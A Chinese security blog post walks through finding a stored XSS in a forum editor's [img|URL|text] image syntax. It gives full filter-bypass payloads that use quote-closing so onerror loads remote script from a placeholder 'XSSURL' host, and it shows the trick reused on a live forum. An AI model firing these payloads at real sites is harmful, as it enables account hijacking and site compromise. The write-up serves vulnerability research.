专栏首页HACK学习漏洞挖掘 | 一处图片引用功能导致的XSS

漏洞挖掘 | 一处图片引用功能导致的XSS

初步测试

一开始尝试XSS,发现程序有过滤,提交均显示Tags are not permitted,最后测出来的是过滤 < ,不过滤 >

因为提示速度比较快,猜测前端有一层检测。尝试绕过前端检测,burp拦截正常提交的内容,替换xss payload后发送,发现会自动跳转回首页,由此发现程序后端也有内容检测,这里直接xss暂时行不通。

查看编辑器的其他功能:

图片上传: 可上传aspx(其他可能解析后缀均已尝试),不能解析并跳转至首页。 可上传html并解析,这种方式构造的xss通常需要主动攻击,且攻击时易被管理员察觉到异常,暂不考虑。

表情功能:没什么可利用的。

柳暗花明又一村

当看到编辑器提示的 img 外部图片引用方式时引起了我的注意,这里感觉可以操作一下:

正常测试

先来看下正常引用方式时前端的显示,链接被带入到src中(logo前文字涉及域名,打码):

[img|XSSURL|xxxxx Logo]

带入payload

把xss payload 放在链接的位置再看一下:

常规的payload:
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';>
构造的payload:
[img|x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';|xxxxx Logo]

提交后审查元素发现为如下显示:

尝试闭合

尝试闭合 x 处的双引号,让 onerror 逃逸出来:

[img|x" onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';|hello]

这里提交后发现payload并没有执行成功,仔细看发现程序输出时分别在 onerror= 和 ; 后面加了双引号。

闭合成功

直接给个 > 让它闭合,虽然成功加载了,但是页面显示会有错误,这样十分容易被发现倪端,不够完美。

[img|x" onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';>|hello]

换个思路通过闭合掉 ; 后面的双引号,显示效果如下:

[img|x" onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';"|hello]

最终在没有任何错误内容显示的情况下成功执行了xss payload:

看到这里可能有人就会想,这种案例触发的xss是不是很少存在,因为毕竟不是每个编辑器都用这种图片外链引用方式,那么请继续看下面。

灵活运用

这几天在搞一个gangdu的论坛,在回复功能处,又遇到了同样的问题。

本来这个功能应该只能放图片链接的,但是这里插入的链接格式和内容并没有做校验。

x onerror=s=createElement('script');body.appendChild(s);s.src='XSSURL';

这里直接把payload放进去,看下前端显示

同样的思路,这里直接闭合就好了

x" onerror="s=createElement('script');body.appendChild(s);s.src='XSSURL';

成功加载payload

平时渗透的时候,看到功能点不要上去就是蛮干,先预想下这个功能是大概怎么实现的,然后思路猥琐一点,心细一点,往往会有意想不到的收获的,就写到这里吧。

本文分享自微信公众号 - HACK学习呀(Hacker1961X),作者:Se7nsec

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-12-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 记一次SQL Server报错注入

    需要测试一个网站,刚开始看到网站时感觉希望不大,因为验证码是需要拖动的,这也就意味着很大可能没办法爆破,另一方面是都用这种验证码了,安全做的能很差劲吗?果然,试...

    HACK学习
  • 【注入练习】SQLi-Labs过关全攻略

    SQLI,sql injection,我们称之为 sql 注入。何为 sql,英文:Structured Query Language, 叫做结构化查询语言。常...

    HACK学习
  • 树莓派全家福

    Raspberry Pi(树莓派)是为学习计算机编程教育而设计,只有信用卡大小的微型电脑。自问世以来,受众多计算机发烧友和创客的追捧。从第一枚树莓派发布至今,已...

    HACK学习
  • 深度学习在美团点评的应用

    前言 近年来,深度学习在语音、图像、自然语言处理等领域取得非常突出的成果,成了最引人注目的技术热点之一。美团点评这两年在深度学习方面也进行了一些探索,其中在自然...

    美团技术团队
  • DVWA笔记(五)----File Upload

    这两天自己总结的web基础感觉还是蛮有用的,碰到正经的CTF题目虽然可能依旧磕绊,但至少知道出题人的想法了,除了脑洞题。。有些脑洞我是真的服...废话不多讲,直...

    用户5878089
  • GaiaWorld公链技术研究论文获第五届国际云计算与安全国际会议 (ICAIS 2019)会刊收录

    近日,第五届国际云计算与安全国际会议 (ICAIS 2019)会刊收录了GaiaWorld公链关于CPoS技术的研究论文,名为《GaiaWorld:A Nove...

    GAIAWorld
  • PHP任意文件上传漏洞(CVE-2015-2348)

    安全研究人员今天发布了一个中危漏洞——PHP任意文件上传漏洞(CVE-2015-2348)。 在上传文件的时候只判断文件名是合法的文件名就断定这个文件不是恶意文...

    FB客服
  • CVPR2020 | 室内设计师失业?针对语言描述的自动三维场景设计算法

    近日,计算机视觉顶会CVPR 2020接收论文结果公布,从6656篇有效投稿中录取了1470篇论文,录取率约为22%。在《Intelligent Home 3D...

    AI科技评论
  • dvwa实战-文件上传

    文件上传漏洞可以说是危害很大了,因为可以直接通过此漏洞getshell。漏洞原因简单点说就是由于开发人员或者网站运维人员的一些失误导致用户上传的文件可以被服务器...

    tnt阿信
  • DVWA靶机之文件上传漏洞通关笔记

    文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常...

    7089bAt@PowerLi

扫码关注云+社区

领取腾讯云代金券